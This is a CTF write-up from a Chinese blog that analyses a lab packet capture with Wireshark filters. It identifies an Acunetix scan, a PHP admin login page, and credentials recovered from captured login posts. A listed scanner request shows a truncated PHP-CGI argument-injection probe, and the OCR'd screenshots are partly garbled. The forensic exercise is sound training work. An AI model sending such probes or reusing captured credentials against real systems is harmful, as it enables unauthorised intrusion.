# 流量分析——安恒科技(八月CTF)

# 原创

本文链接: <u>https://blog.csdn.net/JohnnyG2000/article/details/122468290</u>

版权

流量分析

- 一、题目背景
- 二、关卡列表
- 三、解题过程
  - 1、黑客使用的扫描器
  - 2、黑客扫描到的登陆后台
  - 3、黑客登陆web后台所使用的账号密码(形式:username/password)
  - 4、黑客上传的webshell文件名、内容以及内容的base编码
  - 5、黑客找到的robots.txt中的flag
  - 6、黑客找到的数据库密码
  - 7、黑客在数据库中找到的hash\_code
  - 8、黑客破解账号ijnu@test.com得到的密码
  - 9、黑客攻击的web服务器的网卡配置和网卡内网IP
  - 10、黑客登陆了mail系统所使用的账号和密码(形式: username/password)
  - 11、黑客获得的VPN的IP

# 一、题目背景

某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登 陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题

# 二、关卡列表

1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器

2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)

3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password)

4 某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码

5 某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么

6 某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少

7 某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash\_code是什么

8 某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么

9 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip

10 某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号密码登陆了mail系统(形式: username/password)

11 某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是多少

# 三、解题过程

🚄 webone.pcap

## 1、黑客使用的扫描器

打开webone.pcap流量包,按照协议类型逐一查询。当看到http协议的时候,发现了明显的AVWS扫描器特征。

. 🗆 🗙

| 文件(F)  | 编辑(E) 视图     | (V) 跳转(G       | i) 捕获(C)           | 分析(A)          | 统计(S)              | 电话(Y)               | 无线(W)       | 工具(T)          | 帮助(H)   | )                                    |           |
|--------|--------------|----------------|--------------------|----------------|--------------------|---------------------|-------------|----------------|---------|--------------------------------------|-----------|
|        | 6 💿 📘 🛅      | 🗙 🛅 🤇          | ₹ 👄 🔿 ।            | 2 🛉 👃          |                    | $\oplus$ $\Theta$   | Q. 🎹        |                |         |                                      |           |
| http   |              |                |                    |                |                    |                     |             |                |         |                                      | ;达式…   +  |
| No.    | Time         | Source         |                    | Desti          | nation             |                     | Protocol    | Length         | Info    |                                      | ^         |
| 37     | 2828.029     | 192.168.       | 94.59              | 192.           | 168.32.            | .189                | HTTP        | 248            | GET /p  | page.php?id=1 HTTP/1.1               |           |
| 37     | 2828.056     | 192.168.       | 32.189             | 192.           | 168.94.            | . 59                | HTTP        | 231            | HTTP/1  | l.1 200 OK (text/html)               |           |
| 37     | 2844.616     | 192.168.       | 94.59              | 192.           | 168.32.            | .189                | HTTP        | 248            | GET /p  | page.php?id=1 HTTP/1.1               |           |
| 37     | 2844.641     | 192.168.       | 32.189             | 192.           | 168.94.            | . 59                | HTTP        | 231            | HTTP/1  | l.1 200 OK (text/html)               |           |
|        | 2915.247     | 192.168.       | 94.59              | 192.           | 168.32.            | .189                | HTTP        | 338            | GET /a  | acunetix-wvs-test-for-some-inexister | nt        |
| 38     | 2915.247     | 192.168.       | 94.59              | 192.           | 168.32.            | .189                | HTTP        | 296            | GET /   | HTTP/1.1                             |           |
| - 38   | 2915.248     | 192.168.       | 32.189             | 192.           | 168.94.            | . 59                | HTTP        | 554            | HTTP/1  | 1.1 404 Not Found (text/html)        |           |
| 38     | 2915.278     | 192.168.       | 32.189             | 192.           | 168.94.            | . 59                | HTTP        | 59             | HTTP/1  | l.1 200 OK (text/html)               |           |
| 38     | 2917.471     | 192.168.       | 94.59              | 192.           | 168.32.            | .189                | HTTP        | 369            | GET /   | HTTP/1.1                             | ~         |
| > Fram | ie 3835: 338 | bytes o        | n wire (           | 2704 bi        | ts), 33            | 8 bytes             | capture     | d (2704        | 4 bits) | )                                    | ^         |
| > Ethe | ernet II, Sr | c: Hangz       | hou 39:4           | 2:ed (b        | 0:f9:63            | :39:42:             | ed), Dst    | : Vmwa         | re cb:9 | ,<br>9f:85 (00:0c:29:cb:9f:85)       |           |
| > Inte | ernet Protoc | ol Versi       | on 4, Sr           | c: 192.        | 168.94.            | 59, Dst             | : 192.16    | 8.32.1         | 89      |                                      |           |
| > Trar | smission Co  | ntrol Pr       | otocol,            | Src Por        | t: 1110            | , Dst P             | ort: 80,    | Seq:           | 1, Ack: | : 1, Len: 284                        |           |
| ✓ Hype | ertext Trans | fer Prot       | ocol               |                |                    | ·                   |             |                |         |                                      |           |
| > G    | ET /acuneti: | x-wvs-tes      | st-for-so          | ome-inex       | istent-            | file H              | TTP/1.1\r   | r\n            |         |                                      |           |
| U      | ser-Agent: 1 | Mozilla/9      | 5.0 (Wind          | dows NT        | 6.1; WC            | W64) A              | ppleWebKi   | t/537.         | 21 (KH  | TML, like Gecko) Chrome/41.0.2228.0  | Safa      |
| Р      | ragma: no-ca | ache\r\n       |                    |                |                    |                     |             |                |         |                                      |           |
| н      | ost: 192.16  | 8.32.189       | \r\n               |                |                    |                     |             |                |         |                                      |           |
| C      | onnection: ( | Close\r\r      | 1                  |                |                    |                     |             |                |         |                                      |           |
| A      | ccept-Encod: | ing: gzip      | ,deflate           | e\r\n          |                    |                     |             |                |         |                                      |           |
| Α      | ccent: */*\u | r\n            |                    |                |                    |                     |             |                |         |                                      | ~         |
| 0000   | 00 0c 29 cb  | 9f 85 b        | 0 f9 63            | 39 42          | ed 08 0            | 0 45 00             | ))          | ··· c9         | B···E·  |                                      | ^         |
| 0010   | 01 44 6c 3c  | 40 00 7        | f 06 8e            | 2e c0          | a8 5e 3            | b c0 a8             | 3 ·D1<@     | · · · ·        | ··^;··  |                                      |           |
| 0020   | 20 bd 04 56  | 5 00 50 d      | 6 a4 41            | 59 76          | 9b 2a 5            | 4 50 18             | 3 · · V ·   | P·· AY         | v·*TP·  |                                      |           |
| 0030   | 00 44 80 ef  | F 00 00 4      | 7 45 54            | 20 2f          | 61 63 7            | 5 6e 65             | 5 • D • • • | -GE T          | /acune  |                                      |           |
| 0040   | 74 69 78 20  | 1 77 76 7      | 3 2d 74            | 65 73          | 74 2d 6            | 6 6f 72             | 2 tix-w     | vs- te         | st-for  |                                      |           |
| 0050   | 2d 73 6f 6d  | 1 65 2d 6      | 96e 65             | 78 69<br>50 05 | /3 74 6            | 56e74               | -some       | -in ex         | istent  |                                      |           |
| 0050   |              | 203204         | 85454<br>7656-     | 50 Zt          | 31 Ze 3            | 1 00 0a             | a -tile     |                | /1.1··  |                                      |           |
| 0070   | 6c 6c 61 24  | 20410<br>35263 | 0 20 20<br>0 20 20 | 74 5a          | 20 40 0<br>60 61 6 | 1 7 a 05<br>4 77 73 | 05er-       | Age nt<br>0 (W | indows  |                                      |           |
| 0090   | 20 4e 54 20  | ) 36 2e 3      | 1 3b 20            | 57 4f          | 57 36 3            | 4 29 20             | ) NT 6      | .1: W          | 0W64)   |                                      |           |
| 00a0   | 41 70 70 60  | 65 57 6        | 5 62 4b            | 69 74          | 2f 35 3            | 3 37 2e             | Apple       | Web Ki         | t/537.  |                                      |           |
| 00b0   | 32 31 20 28  | 3 4b 48 5      | 4 4d 4c            | 2c 20          | 6c 69 6            | b 65 20             | ) 21 (K     | HTM L,         | like    |                                      |           |
| 0 2    | webone. pcap |                |                    |                |                    |                     |             |                |         | 分组: 736029 · 已显示: 140933(19.1%)  配置  | : Default |

通过 http contains acunetix 命令可以发现更多awvs的特征,说明黑客是用awvs扫描器进行扫描的。 此时也可得知黑客所使用的IP地址可能是 192.168.94.59,这个IP地址到后面会有一定的作用。

| webone.pcap                                                       | _ |      | × |
|-------------------------------------------------------------------|---|------|---|
| 文件(F) 编辑(E) 视图(V) 跳转(G) 捕获(C) 分析(A) 统计(S) 电话(Y) 无线(W) 工具(T) 帮助(H) |   |      |   |
| ◢ ■ ⊿ ⑧   📙 🗟 🕿 🗳   ९ ⇔ ⇔ 🕾 🗿 💆 🚍   🤤 ୧, ୧, ୧, ୩                  |   |      |   |
| 📕 http contains acumetix                                          |   | 表达式… | + |
|                                                                   |   | -    |   |

| No.   | Time           | Source                                                                                                    | Destination          | Protocol Length Info |                                             | ^   |
|-------|----------------|----------------------------------------------------------------------------------------------------|----------------------|----------------------|---------------------------------------------|-----|
| > 38  | 2915.247       | 192.168.94.59                                                                                                    | 192.168.32.189       | HTTP 338 GET         | /acunetix-wvs-test-for-some-inexistent      |     |
| - 38  | 2915.248       | 192.168.32.189                                                                                                    | 192.168.94.59        | HTTP 554 HTTP        | /1.1 404 Not Found (text/html)              |     |
| 39.   | 2920.708       | 192.168.94.59                                                                                                    | 192.168.32.189       | HTTP 1548 GET        | / HTTP/1.1                                  |     |
| 40.   | 2920.907       | 192.168.94.59                                                                                                    | 192.168.32.189       | HTTP 305 GET         | http://www.acunetix.wvs HTTP/1.1            |     |
| 40.   | . 2920.911     | 192.168.94.59                                                                                                    | 192.168.32.189       | TCP 306 1142         | → 80 [PSH, ACK] Seq=1 Ack=1 Win=17408       |     |
| 42.   | 2921.252       | 192.168.94.59                                                                                                    | 192.168.32.189       | HTTP 297 GET         | /index HTTP/1.1                             |     |
| 42.   | 2921.273       | 192.168.94.59                                                                                                    | 192.168.32.189       | HTTP 299 GET         | /default HTTP/1.1                           |     |
| 78.   | 2925.679       | 192.168.94.59                                                                                                    | 192.168.32.189       | HTTP 971 POST        | /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F      | ~   |
| > Fra | ame 3835: 338  | bytes on wire (270                                                                                                    | 4 bits), 338 bytes o | aptured (2704 bit    | s)                                          | ^   |
| > Eth | nernet II, Sr  | c: Hangzhou_39:42:e                                                                                                    | d (b0:f9:63:39:42:ed | l), Dst: Vmware_cb   | :9f:85 (00:0c:29:cb:9f:85)                  |     |
| > Int | ernet Protoc   | ol Version 4, Src:                                                                                                    | 192.168.94.59, Dst:  | 192.168.32.189       |                                             |     |
| > Tra | ansmission Co  | ntrol Protocol, Src                                                                                                    | Port: 1110, Dst Por  | t: 80, Seq: 1, Ac    | k: 1, Len: 284                              |     |
| ∽ Нур | ertext Trans   | fer Protocol                                                                                                    |                      |                      |                                             |     |
| >     | GET /acuneti   | x-wvs-test-for-some-                                                                                                    | inexistent-file HTT  | P/1.1\r\n            |                                             |     |
| I     | User-Agent: 1  | Mozilla/5.0 (Windows                                                                                                    | NT 6.1; WOW64) App   | leWebKit/537.21 (H   | KHTML, like Gecko) Chrome/41.0.2228.0 Safar | ·i. |
|       | Pragma: no-ca  | ache\r\n                                                                                                    |                      |                      |                                             |     |
|       | Host: 192.16   | 8.32.189\r\n                                                                                                    |                      |                      |                                             |     |
|       | Connection: (  | Close\r\n                                                                                                    |                      |                      |                                             |     |
|       | Accept-Encod:  | ing: gzip,deflate\r\                                                                                                    | \n                   |                      |                                             |     |
|       | Accept: */*\   | r\n                                                                                                    |                      |                      |                                             | ~   |
| <     |                |                                                                                                    |                      |                      |                                             | >   |
| 00a0  | 41 70 70 60    | : 65 57 65 62 4b 69                                                                                                    | 74 2f 35 33 37 2e    | AppleWeb Kit/537     | · .                                         | ^   |
| 00b0  | 32 31 20 28    | 3 4b 48 54 4d 4c 2c                                                                                                    | 20 6c 69 6b 65 20    | 21 (KHTM L, like     | 2                                           |     |
| 00c0  | 47 65 63 6b    | o 6f 29 20 43 68 72                                                                                                    | 6f 6d 65 2f 34 31    | Gecko) C hrome/4     | 1                                           |     |
| 00d0  | 2e 30 2e 32    | 2 32 32 38 2e 30 20                                                                                                    | 53 61 66 61 72 69    | .0.2228. 0 Safar     | ·i                                          |     |
| 00e0  | 2f 35 33 37    | 2e 32 31 0d 0a 50                                                                                                    | 72 61 67 6d 61 3a    | /537.21 · • Pragma   |                                             |     |
| 00100 | 20 6e 6t 20    | 1 63 61 63 68 65 0d                                                                                                    | 0a 48 6† 73 74 3a    | no-cach e··Host      |                                             |     |
| 0100  | 20 31 39 32    | 2 2 3 1 3 5 3 6 2 6 3 3 2 6 3 5 2 6 5 6 5 6 3 7 4 6 9 6 5 6 5 6 3 7 4 6 9 6 5 6 5 6 5 7 4 6 9 6 5 6 5 6 5 7 4 6 9 6 5 6 5 7 4 6 9 6 5 6 5 7 6 9 6 5 6 5 7 4 6 9 6 5 6 5 7 6 9 6 5 6 5 7 6 9 6 5 6 5 7 6 9 6 5 6 5 7 6 9 6 5 7 6 9 6 5 7 6 9 6 5 7 6 9 6 5 7 6 9 6 5 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 6 7 6 9 7 6 9 7 7 6 9 7 7 7 7 | 32 Ze 31 38 39 00    | 192.168 .32.189      |                                             |     |
| 0120  | 73 65 0d 0a    | A1 63 63 65 74 69 67                                                                                                    | 2d 45 6e 63 6f 64    |                      | d                                           |     |
| 0130  | 69 6e 67 3a    | 20 67 7a 69 70 7c                                                                                                    |                      | ing: gri n.defla     | it .                                        |     |
| 0140  | 65 0d 0a 41    | 63 63 65 70 74 3a                                                                                                    | 20 2a 2f 2a 0d 0a    | e··Accep t: */*·     |                                             |     |
| 0150  | 0d 0a          |                                                                                                    |                      | ••                   |                                             |     |
| 0 7   | HTTP Host (htt | m.host), 22 字节                                                                                                    |                      |                      | 分组: 736029 · 戸泉示: 31637 (4,3%)  四苦: Tefavi  | .GŤ |
| -     |                | T                                                                                                    |                      |                      | I NAT TARA CITATION CONTRACTOR IN BUT PERGE |     |

# 2、黑客扫描到的登陆后台

登陆后台99%使用的是 POST 方法,直接使用过滤器过滤。

http.request.method=="POST"

| 🗲 webone.pcap                     |                            |                                                                                     | - • > |
|-----------------------------------|----------------------------|-------------------------------------------------------------------------------------|-------|
| 文件(F) 编辑(E) 视图(V) 跳转(G) 捕获(C)     | 分析(A) 统计(S) 电话(V) 无线       | A) 工具(T) 報助(H)                                                                      |       |
| (■ ∅ 0 - □ 🗙 🖬 ۹ ↔ ↔ 5            | 2 🗿 J 📃 📃 Q Q Q T          |                                                                                     |       |
| http. request. method="POST"      |                            |                                                                                     | ◎     |
| o. Time Source                    | Destination Pro            | col Leneth Info                                                                     |       |
| + 86 54.823928 192.168.94.233     | 192.168.32.189 HTT         | 753 POST /admin/login.php?rec=login HTTP/1.1 (application/x-www-form-urlencoded)    |       |
| 490 390.0149 192.168.94.233       | 192.168.32.189 HTT         | 753 POST /admin/login.php?rec=login HTTP/1.1 (application/x-www-form-urlencoded)    |       |
| 872 418.8542 192.168.94.233       | 192.168.32.189 HTT         | 1740 POST /admin/article.php?rec=update HTTP/1.1                                    |       |
| 12 608.7543 192.168.94.233        | 192.168.32.189 HTT         | 1381 POST /admin/page.php?rec=update HTTP/1.1 (application/x-www-form-urlencoded)   |       |
| 14 723.3313 192.168.94.233        | 192.168.32.189 HTT         | 1103 POST /admin/page.php?rec=update HTTP/1.1 (application/x-www-form-urlencoded)   |       |
| 19 962.0422 192.168.94.233        | 192.168.32.189 HTT         | 1090 POST /admin/backup.php?rec=backup HTTP/1.1 (application/x-www-form-urlencoded) |       |
| 39 2920.710 192.168.94.59         | 192.168.32.189 HTT         | 426 POST /console/j_security_check HTTP/1.1 (application/x-www-form-urlencoded)     |       |
| 52 2922.429 192.168.94.59         | 192.168.32.189 HTT         | 425 POST /_vti_bin/shtml.exe?_vti_rpc HTTP/1.1 (application/x-www-form-urlencoded)  |       |
| 53 2922.529 192.168.94.59         | 192.168.32.189 HTT         | 426 POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 (application/x-www-form-urlencoded) |       |
| 68 2924.151 192.168.94.59         | 192.168.32.189 HTT         | 324 POST / HTTP/1.1                                                                 | -     |
| 72 2924.636 192.168.94.59         | 192.168.32.189 HTT         | 730 POST /admin/login.php?rec=login HTTP/1.1 (application/x-www-form-urlencoded)    |       |
| Frame 96, 752 hutter on udge (603 | 402 400 22 400 UT          |                                                                                     |       |
| Ethennet TT Snc: Hangzhou 39:42   | + DICS), 755 Dyces captur  | u (024 015)<br>htt://www.ch.0f.85 (00.0c-20.ch.0f.85)                               |       |
| Internet Protocol Version 4 Sec   | - 102 168 04 233 Det - 10  | 168 33 180                                                                          |       |
| Internet Protocol Version 4, 510  | nc Pont: 54744 Det Pont:   | 80 Sec 1 Ack 1 Jap 600                                                              |       |
| Hypertext Transfer Protocol       | , e rore. 54744, 53e rore. | 00, 36q. 1, McK. 1, Len. 000                                                        |       |
| HTML Form URL Encoded: applicati  | on/x-www-form-urlencoded   |                                                                                     |       |
| > Form item: "user name" = "人事    |                            |                                                                                     |       |
| > Form item: "password" = "hr12   | 3456"                      |                                                                                     |       |
| > Form item: "submit" = "晉录"      |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |
| 2000 00 0c 29 cb 9f 85 b0 f9 63   | 39 42 ed 08 00 45 00       | )                                                                                   |       |
| 010 02 e3 48 93 40 00 7f 06 af    | 8a c0 a8 5e e9 c0 a8       |                                                                                     |       |
| 020 20 bd d5 d8 00 50 67 7a 68    | 44 7c af a8 44 50 18       | ····Pgz hD ··DP·                                                                    |       |
| 0030 01 00 16 e6 00 00 50 4f 53   | 54 20 2f 61 64 6d 69       | ····PO ST /admi                                                                     |       |
| 0040 6e 2f 6c 6f 67 69 6e 2e 70   | 68 70 3f 72 65 63 3d n     | login. php?rec=                                                                     |       |
| 0050 6c 6f 67 69 6e 20 48 54 54   | 50 2f 31 2e 31 0d 0a 10    | gin HT TP/1.1                                                                       |       |
| 060 48 6f 73 74 3a 20 31 39 32    | 2e 31 36 38 2e 33 32 Ho    | 19 2.168.32                                                                         |       |
| 20/0 2e 31 38 39 0d 0a 43 6f 6e   | 6e 65 63 /4 69 6f 6e .:    | 19- Connection                                                                      |       |
| 3000 3a 20 00 03 65 70 20 61 60   | 67 74 69 30 20 37 32 m     |                                                                                     |       |
| 0000 0e 74 05 0e 74 20 40 05 0e   | 6f 6e 74 72 6f 6c 3a       | Inche Ignit 74                                                                      |       |
| 20b0 20 6d 61 78 2d 61 67 65 3d   | 30 0d 0a 4f 72 69 67       | As-ace =0Orig                                                                       |       |
| 00c0 69 6e 3a 20 68 74 74 70 3a   | 2f 2f 31 39 32 2e 31 in    | : http://192.1                                                                      |       |
| 00d0 36 38 2e 33 32 2e 31 38 39   | 0d 0a 55 70 67 72 61 68    | .32.18 9. Upgra                                                                     |       |
| 00e0 64 65 2d 49 6e 73 65 63 75   | 72 65 2d 52 65 71 75 de    | -Insec ure-Requ                                                                     |       |
| IGFA 65 73 74 73 35 20 31 AH AS   | 13 6f 60 71 65 60 71 0     | ce 1. Contant                                                                       |       |
|                                   |                            |                                                                                     |       |
|                                   |                            |                                                                                     |       |

找出存在 rec=login 的流量,通过追踪TCP流,如果看到是302重定向,基本就是表示登陆成功。

| ▲ Wireshark · 追踪 TCP 流 (tcp.stream eq 4) · webone.pcap        | -         |        | ×            |
|---------------------------------------------------------------|-----------|--------|--------------|
| POST /admin/login.php?rec=login HTTP/1.1                      |           |        |              |
| Host: 192.168.32.189                                          |           |        |              |
| Connection: keep-alive                                        |           |        |              |
| Content-Length: 72                                            |           |        |              |
| Cache-Control: max-age=0                                      |           |        |              |
| Origin: http://192.168.32.189                                 |           |        |              |
| Upgrade-Insecure-Requests: 1                                  |           |        |              |
| Content-Type: application/x-www-form-urlencoded               | 1/1+ /50  | 7 76   |              |
| User-Agent: Mozilia/5.0 (Windows NI 6.1; Win64; X64) Applewer | )K1T/53   | 7.36   |              |
| (KTITPL, IIKe GECKO) CTITOME/00.0.3440.04 Satari/357.50       | ) imago   | 1      |              |
| webn_image/anng */*:g=0.8                                     | ', illage | /      |              |
| Referer: http://192.168.32.189/admin/login.php                |           |        |              |
| Accept-Encoding: gzip. deflate                                |           |        |              |
| Accept-Language: zh-CN.zh:q=0.9                               |           |        |              |
| Cookie: PHPSESSID=9c0akmao1oop7t2itcss7dmvm2                  |           |        |              |
|                                                               |           |        |              |
| user_name=%E4%BA%BA%E4%BA%8B&password=hr123456&submit=%E7%99% | 6B8%E5%   | BD%95H | TTP          |
| /1.1 302 Found                                                |           |        |              |
| Date: Wed, 08 Aug 2018 06:35:42 GMT                           |           |        |              |
| Server: Apache/2.2.15 (CentOS)                                |           |        |              |
| X-Powered-By: PHP/5.4.45                                      |           |        |              |
| Expires: Fri, 14 Mar 1980 20:53:00 GMT                        |           |        |              |
| Cache-Control: no-cache, must-revalidate                      |           |        |              |
| Pragma: no-cache                                              |           |        |              |
| Last-Modified: Wed, 08 Aug 2018 06:35:42 GMI                  |           |        |              |
| Content Longth: 0                                             |           |        |              |
| Connection: close                                             |           |        |              |
| Content-Type: text/html: charset=utf-8                        |           |        |              |
| concerne typer certe, namely endineer act o                   |           |        |              |
|                                                               |           |        |              |
|                                                               |           |        |              |
|                                                               |           |        |              |
|                                                               |           |        |              |
| 1 李白維 从程 1 即见禁 从程 1 turn(c)                                   |           |        |              |
| ■ 20 m が起, 1 m m m m m m m m m m m m m m m m m m              | I v       | 流 4    | ÷            |
| 本44.                                                          |           |        | ( <b>v</b> ) |
|                                                               | 1         | 14 N   | )-(N)        |
| 滤掉此流 打印 Save as <sup>…</sup> 返回 C.S                           | 999 @     | lohiti | y.G          |

可以看到第一个就是 302重定向 了。 此处只是示例,后面还有很多是 302重定向 的流量,此处省略。

# 3、黑客登陆web后台所使用的账号密码(形式:username/password)

通过上题的查询,发现有很多 302重定向 登陆成功的结果,有很多不同的账号密码,为了确定黑客所使用的,根据第一题所查找 的黑客的ip地址 192.168.94.59,并得出上题查询的登录流量存在 rec=login,再次使用过滤语句过滤。

| htt        | p.red           | quest.met                 | hod=="POS1                  | T" an          | d ip.       | src==192.168.94.5                         | 9 and http contains "rec=login"                                   |       |
|------------|-----------------|---------------------------|-----------------------------|----------------|-------------|-------------------------------------------|-------------------------------------------------------------------|-------|
|            |                 |                           |                             |                |             |                                           |                                                                   |       |
|            |                 |                           |                             |                |             |                                           |                                                                   |       |
|            |                 |                           |                             |                |             |                                           |                                                                   |       |
| 🚄 web      | one.pcap        |                           |                             |                |             |                                           | - (                                                               | o ×   |
| 文件(F)      | 編辑(E) 初         | 2图(V) 跳转(G) 捕获(C)         | 分析(A) 统计(S) 电话(Y)           | ) 无线(W) :      | 工具(T) 帮助    | H)                                        |                                                                   |       |
| <i>i</i> = | 1 💿 📘           | ि 🔀 🖸 । ९ 👄 🖷             | 🛎 T 🛓 📃 📃 Q, Q,             | Q. 🎹           |             |                                           |                                                                   |       |
| 📕 http     | . request. neth | uod="POST" and ip. src=19 | 2.168.94.59 and http contai | ins ″reo≖login | 1″          |                                           | 🛛 🗔 💌 🙏                                                           | 达式… + |
| No.        | Time            | Source                    | Bestination                 | Protocol I     | Length Info |                                           |                                                                   | ^     |
| 73         | 5623.712        | 2 192.168.94.59           | 192.168.32.189              | HTTP           | 733 POST    | /admin/login.php?rec=login HTTP/1.1       | (application/x-www-form-urlencoded)                               |       |
| 73         | 5623.728        | 3 192.168.94.59           | 192.168.32.189              | HTTP           | 734 POST    | /admin/login.php?rec=login HTTP/1.1       | (application/x-www-form-urlencoded)                               |       |
| 73         | 5623.737        | 192.168.94.59             | 192.168.32.189              | HTTP           | 736 POST    | /admin/login.php?rec=login HTTP/1.1       | (application/x-www-form-urlencoded)                               |       |
| 73         | 5623.737        | 7 192.168.94.59           | 192.168.32.189              | HTTP           | 734 POST    | /admin/login.php?rec=login HTTP/1.1       | (application/x-www-form-urlencoded)                               |       |
| 73         | 5623.747        | 7 192.168.94.59           | 192.168.32.189              | HTTP           | 735 POST    | /admin/login.php?rec=login HTTP/1.1       | (application/x-www-form-urlencoded)                               |       |
| 73         | 5626.308        | 3 192.168.94.59           | 192.168.32.189              |                | 734 [TCP    | Spurious Retransmission] POST /admin      | /login.php?rec=login HTTP/1.1 (application/x-www-form-urlencoded) |       |
| 73         | 5626.308        | 3 192.168.94.59           |                             |                |             |                                           |                                                                   |       |
| 73         | FC9C 373        | 102 109 04 50             | 100 100 00 100              | 11770          | 776 [769    | Countries Determinational DOCT (education | (looks shalara looks HTTD/4 4 - /aaslianda da aa Gaas walaandad)  |       |
|            |                 |                           |                             |                |             |                                           |                                                                   |       |

| 73    |              | . 192.168.94.59                        |                                          |             |                                              | /login.php?rec=login HTTP/1.1 (application/x-www-form-urlenc |                               |                 |
|-------|--------------|----------------------------------------|------------------------------------------|-------------|----------------------------------------------|--------------------------------------------------------------|-------------------------------|-----------------|
| 73    | 5702.375.    | . 192.168.94.59                        | 192.168.32.189                           | HTTP        | 731 POST /admin/login.php?rec=login HTTP/1.1 | (application/x-www-form-urlencoded)                          |                               |                 |
| -73   | 5817.763.    | . 192.168.94.59                        | 192.168.32.189                           | HTTP        | 754 POST /admin/login.php?rec=login HTTP/1.1 | (application/x-www-form-urlencoded)                          |                               | <b>—</b>        |
|       | 722547       | 754.1                                  | (6000 111 ) 754 1 1                      |             | (6022 111 )                                  |                                                              |                               |                 |
| > Fra | ime /3351/:  | 754 bytes on wire                      | (6032 D1ts), 754 Dyte                    | es captured | (6032 DITS)                                  |                                                              |                               |                 |
| 2 EU  | lernet II, s | Src: Hangzhou_59:4                     |                                          | ed), DSC: 1 | /mware_cd:91:65 (00:00:29:00:91:65)          |                                                              |                               |                 |
| > Int | ernet prote  | Control Protocol                       | Spc Popt: 12629 Det 1                    | : 192.100.: | 22.109                                       |                                                              |                               |                 |
| > Hur | entext Tran  | sfer Protocol                          | SIC FORC. 12020, 0SC 1                   | FOFC: 00, . | eq. 1, Acc. 1, Len. 700                      |                                                              |                               |                 |
| Y HTN | L Form LIRI  | Encoded: applicat                      | ion/x-waw-form-urlence                   | nded        |                                              |                                                              |                               |                 |
|       | Form item:   | "user name" = "adr                     | min"                                     | bucu        |                                              |                                                              |                               |                 |
| >     | Form item:   | "nassword" = "admi                     | inl@#pass123"                            |             |                                              |                                                              |                               |                 |
| >     | Form item:   | "submit" = "谷录"                        |                                          |             |                                              |                                                              |                               |                 |
|       |              | 11.7                                   |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
|       |              |                                        |                                          |             |                                              |                                                              |                               |                 |
| 0200  | 2a 3b 71     | 3d 30 2e 38 0d 0a                      | 3 52 65 66 65 72 65 72                   | *;q-0.8     | Referer                                      |                                                              |                               | ^               |
| 0210  | 3a 20 68 1   | 74 74 70 3a 2f 2f                      | F 31 39 32 2e 31 36 38                   | : http:     | / /192.168                                   |                                                              |                               |                 |
| 0220  | 2e 33 32 2   | 2e 31 38 39 2f 61                      | l 64 6d 69 6e 2f 6c 6f                   | .32.189     | / admin/lo                                   |                                                              |                               |                 |
| 0230  | 67 69 6e 2   | 2e 70 68 70 0d 0a                      | a 41 63 63 65 70 74 2d                   | gin.php     | Accept-                                      |                                                              |                               |                 |
| 0240  | 45 6e 63 6   | 6f 64 69 6e 67 3a                      | a 20 67 7a 69 70 2c 20                   | Encoding    | g : gzip,                                    |                                                              |                               |                 |
| 0250  | 64 65 66 6   | 6c 61 /4 65 0d 0a                      | a 41 63 63 65 70 74 2d                   | de+late     | Accept-                                      |                                                              |                               |                 |
| 0260  | 40 61 66 6   |                                        | a 20 /a 68 20 43 4e 2c                   | Language    | e : zn-un,                                   |                                                              |                               |                 |
| 0270  | 7a 00 50 a   | /1 50 50 20 59 60<br>48 50 53 45 53 53 | 00 40 00 00 00 00 00 00 00 00 00 00 00 0 | 2n;q=0.     | STD                                          |                                                              |                               |                 |
| 0200  | 67 72 38 6   | 6b 7/ 68 6/ 66 63                      | 67 62 61 6f 65 65 66                     | an8kthd     | F cabaceef                                   |                                                              |                               |                 |
| 0200  | 70 67 67 7   | 76 37 34 0d 0a 0d                      | 1 0a 75 73 65 72 5f 6e                   | nggv74-     | - user n                                     |                                                              |                               |                 |
| 02b0  | 61 6d 65     | 3d 61 64 6d 69 6e                      | 26 70 61 73 73 77 6f                     | ame=adm     | n&passwo                                     |                                                              |                               |                 |
| 02c0  | 72 64 3d     | 61 64 6d 69 6e 25                      | 5 32 31 25 34 30 25 32                   | rd=admi     | *21%40%2                                     |                                                              |                               |                 |
| 02d0  | 33 70 61     | 73 73 31 32 33 <b>26</b>               | 5 73 75 62 6d 69 74 3d                   | 3pass12     | &submit=                                     |                                                              |                               |                 |
| 02e0  | 25 45 37 2   | 25 39 39 25 42 42                      | 2 25 45 35 25 42 44 25                   | %E7%99%     | 3 B%E5%BD%                                   |                                                              |                               |                 |
| 02f0  | 39 35        |                                        |                                          | 95          |                                              |                                                              |                               |                 |
